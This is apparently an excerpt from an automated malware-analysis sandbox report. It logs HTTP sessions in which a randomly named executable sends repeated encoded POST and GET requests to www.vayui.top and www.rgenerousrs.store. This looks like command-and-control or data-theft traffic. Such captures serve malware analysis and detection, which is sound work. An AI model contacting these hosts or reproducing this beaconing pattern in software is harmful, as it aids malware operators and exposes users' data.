                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US
                                                      Host: www.vayui.top
                                                      Origin: http://www.vayui.top
                                                      Referer: http://www.vayui.top/vg0z/
                                                      Cache-Control: no-cache
                                                      Content-Length: 197
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                      Data Raw: 36 76 53 58 72 5a 78 70 3d 32 37 47 45 30 57 34 36 48 49 4c 61 57 71 56 57 64 4e 35 42 6a 6a 4b 4f 39 47 43 38 73 4d 57 78 4d 39 69 44 32 34 50 5a 2f 53 43 30 51 43 58 38 57 6b 6a 58 38 43 72 30 72 4c 50 41 41 44 70 47 6e 57 6b 65 7a 56 4d 4b 39 39 64 7a 37 32 56 5a 30 32 64 6b 51 61 43 4b 33 72 34 61 56 6a 59 70 73 69 4f 37 55 67 6a 6c 56 6f 69 62 46 34 7a 55 65 2b 61 39 76 77 59 48 6a 52 4f 6c 75 35 41 67 5a 75 77 4b 66 4f 41 43 45 5a 61 76 37 65 51 51 2f 50 66 61 58 4c 4a 37 36 69 43 2b 54 33 42 44 55 32 61 72 50 4b 36 73 2f 44 46 45 34 70 32 64 2f 32 38 49 4c 4f 51 52 56 55 4e 62
                                                      Data Ascii: 6vSXrZxp=27GE0W46HILaWqVWdN5BjjKO9GC8sMWxM9iD24PZ/SC0QCX8WkjX8Cr0rLPAADpGnWkezVMK99dz72VZ02dkQaCK3r4aVjYpsiO7UgjlVoibF4zUe+a9vwYHjROlu5AgZuwKfOACEZav7eQQ/PfaXLJ76iC+T3BDU2arPK6s/DFE4p2d/28ILOQRVUNb
                                                      Nov 24, 2024 08:14:45.606446981 CET887INHTTP/1.1 404 Not Found
                                                      Date: Sun, 24 Nov 2024 07:14:45 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      cf-cache-status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B5689FjxHcuVXmWA34FOicsfxEV8J%2BwCFuKpVrosObE%2F4Bwko2nmqHZMwMtumXdnJ8tDsqa%2B4ctnh0pRLnyszIxxGVaPcHODdEJrs%2FY14pVlsl5pQnKyUs%2BOAB22vKsD"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8e779a971eed42ee-EWR
                                                      Content-Encoding: gzip
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1592&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=735&delivery_rate=0&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                      Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      18192.168.2.949992172.67.145.234801980C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe
                                                      TimestampBytes transferredDirectionData
                                                      Nov 24, 2024 08:14:46.687326908 CET759OUTPOST /vg0z/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US
                                                      Host: www.vayui.top
                                                      Origin: http://www.vayui.top
                                                      Referer: http://www.vayui.top/vg0z/
                                                      Cache-Control: no-cache
                                                      Content-Length: 221
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                      Data Raw: 36 76 53 58 72 5a 78 70 3d 32 37 47 45 30 57 34 36 48 49 4c 61 57 4b 46 57 66 71 56 42 72 6a 4b 52 68 57 43 38 69 73 58 5a 4d 39 75 44 32 39 76 4a 2f 68 6d 30 51 6d 62 38 59 46 6a 58 31 53 72 30 6b 72 50 59 4f 6a 70 50 6e 57 59 38 7a 58 49 4b 39 35 4e 7a 37 30 4e 5a 30 6e 64 6c 53 4b 43 45 73 62 34 63 62 44 59 70 73 69 4f 37 55 6b 4b 74 56 70 4b 62 46 49 44 55 65 66 61 2b 77 41 59 47 69 52 4f 6c 2f 70 41 6b 5a 75 78 5a 66 4b 42 6e 45 62 69 76 37 61 63 51 2b 64 33 5a 65 4c 4a 35 35 53 44 39 44 55 30 6d 62 32 43 65 43 38 36 38 76 79 6c 73 37 49 4b 44 75 45 31 54 65 5a 51 32 53 7a 45 7a 57 6b 53 59 70 72 4d 36 4b 2f 52 4f 71 66 73 72 72 56 55 64 2b 51 3d 3d
                                                      Data Ascii: 6vSXrZxp=27GE0W46HILaWKFWfqVBrjKRhWC8isXZM9uD29vJ/hm0Qmb8YFjX1Sr0krPYOjpPnWY8zXIK95Nz70NZ0ndlSKCEsb4cbDYpsiO7UkKtVpKbFIDUefa+wAYGiROl/pAkZuxZfKBnEbiv7acQ+d3ZeLJ55SD9DU0mb2CeC868vyls7IKDuE1TeZQ2SzEzWkSYprM6K/ROqfsrrVUd+Q==
                                                      Nov 24, 2024 08:14:47.949179888 CET891INHTTP/1.1 404 Not Found
                                                      Date: Sun, 24 Nov 2024 07:14:47 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      cf-cache-status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G7bFXhafSdat23BO4kabOB%2BYgPSQPnB39wCQnVpHhgysx0pM8gUkAfZz3aD2Du%2F5jU2bfQqJgEW1iCKWle35SgrBwbsNsXzdCHy642LpyG%2FfFziYuFuUa03V8TssY3bX"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8e779aa7bf1141cd-EWR
                                                      Content-Encoding: gzip
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1536&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=759&delivery_rate=0&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                      Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a 36 33 0d 0a b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: f63(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      19192.168.2.949993172.67.145.234801980C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe
                                                      TimestampBytes transferredDirectionData
                                                      Nov 24, 2024 08:14:49.344791889 CET1772OUTPOST /vg0z/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US
                                                      Host: www.vayui.top
                                                      Origin: http://www.vayui.top
                                                      Referer: http://www.vayui.top/vg0z/
                                                      Cache-Control: no-cache
                                                      Content-Length: 1233
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                      Data Raw: 36 76 53 58 72 5a 78 70 3d 32 37 47 45 30 57 34 36 48 49 4c 61 57 4b 46 57 66 71 56 42 72 6a 4b 52 68 57 43 38 69 73 58 5a 4d 39 75 44 32 39 76 4a 2f 68 75 30 51 56 54 38 59 6e 4c 58 6e 43 72 30 74 4c 50 62 4f 6a 6f 50 6e 57 77 34 7a 58 55 38 39 37 46 7a 70 48 46 5a 6a 6b 46 6c 62 4b 43 45 6b 37 34 5a 56 6a 5a 74 73 69 65 2f 55 67 75 74 56 70 4b 62 46 4b 4c 55 4a 65 61 2b 79 41 59 48 6a 52 4f 78 75 35 41 63 5a 71 6c 4a 66 4b 55 53 59 34 71 76 36 2b 77 51 7a 4f 66 5a 43 62 4a 42 77 43 44 66 44 55 6f 31 62 32 75 73 43 38 6d 57 76 31 4a 73 74 70 6e 5a 31 67 45 4a 43 59 55 57 64 53 59 6d 62 43 71 66 6e 37 74 64 53 65 64 44 31 39 78 41 67 47 5a 35 71 6b 59 79 33 62 62 61 73 31 56 48 36 56 73 6c 54 79 52 2b 55 34 70 55 71 37 2b 70 47 63 79 61 46 4a 77 55 61 74 51 46 68 52 6d 36 59 64 74 66 2f 36 5a 35 2b 53 4b 71 58 4b 41 31 57 36 79 79 6d 73 30 50 70 6f 2f 71 74 52 65 59 52 6b 6b 79 66 68 46 46 78 59 45 44 6d 2b 4e 52 33 46 6a 32 45 48 4e 39 43 45 39 77 53 30 59 39 6f 39 37 71 36 69 6d 42 38 75 6c 67 75 [TRUNCATED]
                                                      Data Ascii: 6vSXrZxp=27GE0W46HILaWKFWfqVBrjKRhWC8isXZM9uD29vJ/hu0QVT8YnLXnCr0tLPbOjoPnWw4zXU897FzpHFZjkFlbKCEk74ZVjZtsie/UgutVpKbFKLUJea+yAYHjROxu5AcZqlJfKUSY4qv6+wQzOfZCbJBwCDfDUo1b2usC8mWv1JstpnZ1gEJCYUWdSYmbCqfn7tdSedD19xAgGZ5qkYy3bbas1VH6VslTyR+U4pUq7+pGcyaFJwUatQFhRm6Ydtf/6Z5+SKqXKA1W6yyms0Ppo/qtReYRkkyfhFFxYEDm+NR3Fj2EHN9CE9wS0Y9o97q6imB8ulgui9W3wa64FtfJGAy7OicV4nvgzBKEHLnYOY5ccDdfTglSey9NhlRWoTdfqCuFQ7S/i84Qc8r+coxpo6Ghrl4OiDmQxHx/1sDhzc+tKjmGM/eZMfYudAtKmsAmq/2JPp2PDuv9oJUrJtIJ9o6GxodcZ8rL+yjsGSFhvdZw3u1yD70FGaCa58KZkkxJ2y0OG/G1pDqJg40H1ULEYarBzM12ipHfoY0H1IpvA//SCrsxZ8/kNZ19CdauqcwyeHN6f1ZcV+2PnlMMRCTGZ66KvL2cqWVRSRVo1myUS43fjB2pM6iJ14hJzNHUOaGM/uE5F0ZkeeXWj2XulX61q9C0clU1pTmCU/6QwIZJZvHNCLyWMwERhoeRNBIRGclRX1kNUPZs3P8IIfbeIfBd79xfhFZEz16lzIk4MBBsYbi4ghoE89E/maQKSkMiTXdg7i2FLF8U/Alh00QDa3W2XqTRcFLSyW1f6Hp014BkMCCHcgRIjrHMBH8pM4c9A7+Yz3NE0jYqGTMj4Mn7zHj3ijf4t8X6bsY0HxQXQEdx7KiEqWzxcnRJOvmH8/dt6A/tuosb7t/9BaFZf26oAmZdCrLZlTgalQg62kkJfMBZXCSVByvwI5LSuDXrnVh30PMfIYfvRdTb/X//062kIbwGKXt5nVTCnFYNpQ6TJlDow/ [TRUNCATED]
                                                      Nov 24, 2024 08:14:50.600850105 CET888INHTTP/1.1 404 Not Found
                                                      Date: Sun, 24 Nov 2024 07:14:50 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      cf-cache-status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xJBwL%2FE7MdPJiZj5Fzv6WHu%2FlKg42kBQnPg%2B%2FBxVwscGd7LQSCu1R6giAiOozMr0Jg31KCASO0eKk0fpSsMgPOrbS9APGWVVL%2Bu9VITSzMrkV8EsU%2BNeuKPMBPXzoDrq"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8e779ab868d04399-EWR
                                                      Content-Encoding: gzip
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1714&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1772&delivery_rate=0&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                      Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      20192.168.2.949994172.67.145.234801980C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe
                                                      TimestampBytes transferredDirectionData
                                                      Nov 24, 2024 08:14:52.015127897 CET475OUTGET /vg0z/?6vSXrZxp=75uk3ictCfC5d95jc9ErhxuZnXjbt/7lQbKW3bXizAnaAV7ibEnK2RjZpZGGD2cxunkBvA8A/q4ys0sLjHkTW6XWjcMaa2pZqz34d1+1Sa3fEZ+ULw==&av=Zj6TS2 HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US
                                                      Host: www.vayui.top
                                                      Connection: close
                                                      User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                      Nov 24, 2024 08:14:53.272583961 CET904INHTTP/1.1 404 Not Found
                                                      Date: Sun, 24 Nov 2024 07:14:53 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      cf-cache-status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6fbdKsZDdU%2BNFDbk%2B86iERBeQFZ2q6uNUvPLGYvNb2mbMONwB5cTZW%2FbFuZM%2FGvUDmMgTUqiulVX5XCCxP8fdfA%2BKSWqcNElgbxXii26coNW9xH%2FCYW%2BDNR0p%2Foo9K48"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8e779ac91e5a1a40-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1748&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=475&delivery_rate=0&cwnd=193&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                      Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      21192.168.2.949995172.67.167.146801980C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe
                                                      TimestampBytes transferredDirectionData
                                                      Nov 24, 2024 08:14:58.839129925 CET759OUTPOST /o362/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US
                                                      Host: www.rgenerousrs.store
                                                      Origin: http://www.rgenerousrs.store
                                                      Referer: http://www.rgenerousrs.store/o362/
                                                      Cache-Control: no-cache
                                                      Content-Length: 197
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                      Data Raw: 36 76 53 58 72 5a 78 70 3d 49 59 6c 6f 75 59 72 49 30 79 51 6c 31 55 68 6a 62 68 72 57 67 39 41 34 58 57 34 61 44 41 62 58 74 63 71 51 5a 32 63 44 62 33 70 41 76 76 5a 68 32 2f 72 54 39 2b 57 61 53 58 4a 75 38 48 30 38 6e 46 68 30 5a 43 7a 68 32 4d 5a 71 34 34 67 2b 73 4d 48 76 41 33 6d 33 37 6a 2b 4f 41 77 52 69 47 68 6b 59 33 4f 72 46 66 7a 55 6d 72 55 4b 66 61 6c 44 63 36 44 4f 6c 56 55 65 67 39 63 46 42 6c 4f 6b 58 34 66 77 32 78 6f 36 41 56 43 61 4e 5a 52 6f 43 4d 43 5a 35 61 4a 58 71 6d 67 48 4e 6e 72 73 4e 61 54 72 6a 31 51 76 51 36 70 5a 79 7a 4f 51 64 6a 2f 48 67 61 43 4f 51
                                                      Data Ascii: 6vSXrZxp=IYlouYrI0yQl1UhjbhrWg9A4XW4aDAbXtcqQZ2cDb3pAvvZh2/rT9+WaSXJu8H08nFh0ZCzh2MZq44g+sMHvA3m37j+OAwRiGhkY3OrFfzUmrUKfalDc6DOlVUeg9cFBlOkX4fw2xo6AVCaNZRoCMCZ5aJXqmgHNnrsNaTrj1QvQ6pZyzOQdj/HgaCOQ
                                                      Nov 24, 2024 08:15:00.279894114 CET1067INHTTP/1.1 404 Not Found
                                                      Date: Sun, 24 Nov 2024 07:15:00 GMT
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      cf-cache-status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2Ivejsjobhv6doc0HZEBkbHe9qHMvgjrPwHFavykbpoguEAAWrQsGzDAHy3cx4DfN05Px0EXkgxt9hbzxRY2G%2FGEUcVK6TiXFt7mgr6pyDwkss8b6i578F2I2t7W2Zy5BGRw%2FlGJZ5A%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8e779af3c8d45e62-EWR
                                                      Content-Encoding: gzip
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1731&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=759&delivery_rate=0&cwnd=148&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                      Data Raw: 66 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff e3 02 00 db 2a cd 17 19 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: f0LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8*0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      22192.168.2.949996172.67.167.146801980C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe
                                                      TimestampBytes transferredDirectionData
                                                      Nov 24, 2024 08:15:01.499948978 CET783OUTPOST /o362/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US
                                                      Host: www.rgenerousrs.store
                                                      Origin: http://www.rgenerousrs.store
                                                      Referer: http://www.rgenerousrs.store/o362/
                                                      Cache-Control: no-cache
                                                      Content-Length: 221
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                      Data Raw: 36 76 53 58 72 5a 78 70 3d 49 59 6c 6f 75 59 72 49 30 79 51 6c 7a 31 52 6a 5a 47 48 57 73 4e 41 35 64 32 34 61 4a 67 61 63 74 63 6d 51 5a 30 77 54 59 42 35 41 76 4c 4a 68 31 36 48 54 2b 2b 57 61 5a 33 4a 52 7a 6e 31 52 6e 46 73 4a 5a 48 54 68 32 4d 6c 71 34 34 77 2b 74 2f 76 73 44 48 6d 35 77 44 2b 4d 4f 51 52 69 47 68 6b 59 33 4f 50 38 66 33 34 6d 72 6b 61 66 62 41 76 62 33 6a 4f 69 57 55 65 67 71 4d 46 46 6c 4f 6b 6c 34 64 46 54 78 75 2b 41 56 47 4b 4e 59 41 6f 42 47 43 5a 7a 58 70 57 75 6c 54 44 48 75 49 59 6c 62 43 66 5a 75 7a 37 73 35 49 6c 73 69 38 5a 47 32 6f 48 48 64 6c 48 34 62 46 55 52 39 75 71 4e 6d 43 6c 49 41 72 75 65 34 76 30 51 67 41 3d 3d
                                                      Data Ascii: 6vSXrZxp=IYlouYrI0yQlz1RjZGHWsNA5d24aJgactcmQZ0wTYB5AvLJh16HT++WaZ3JRzn1RnFsJZHTh2Mlq44w+t/vsDHm5wD+MOQRiGhkY3OP8f34mrkafbAvb3jOiWUegqMFFlOkl4dFTxu+AVGKNYAoBGCZzXpWulTDHuIYlbCfZuz7s5Ilsi8ZG2oHHdlH4bFUR9uqNmClIArue4v0QgA==
                                                      Nov 24, 2024 08:15:02.944839954 CET1065INHTTP/1.1 404 Not Found
                                                      Date: Sun, 24 Nov 2024 07:15:02 GMT
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      cf-cache-status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7XjiIe9cHNjlJXZjJNl6ZGWjlP7RSQaG758O2lPR1zKcOVpBegzdJUCikdwN353Wy9xMvSSGONY91vU4QNy46511Iuk9qMh91tpoZ%2FsvJr45C7Ba2MbKkIuZSnrGnoneKZZkZ9WZ220%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8e779b045f398c65-EWR
                                                      Content-Encoding: gzip
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2049&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=783&delivery_rate=0&cwnd=190&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                      Data Raw: 65 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 db 2a cd 17 19 01 00 00 0d 0a
                                                      Data Ascii: e5LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8b*
                                                      Nov 24, 2024 08:15:02.945843935 CET5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      23192.168.2.949997172.67.167.146801980C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe
                                                      TimestampBytes transferredDirectionData
                                                      Nov 24, 2024 08:15:04.156848907 CET1796OUTPOST /o362/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US
                                                      Host: www.rgenerousrs.store
                                                      Origin: http://www.rgenerousrs.store
                                                      Referer: http://www.rgenerousrs.store/o362/
                                                      Cache-Control: no-cache
                                                      Content-Length: 1233
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
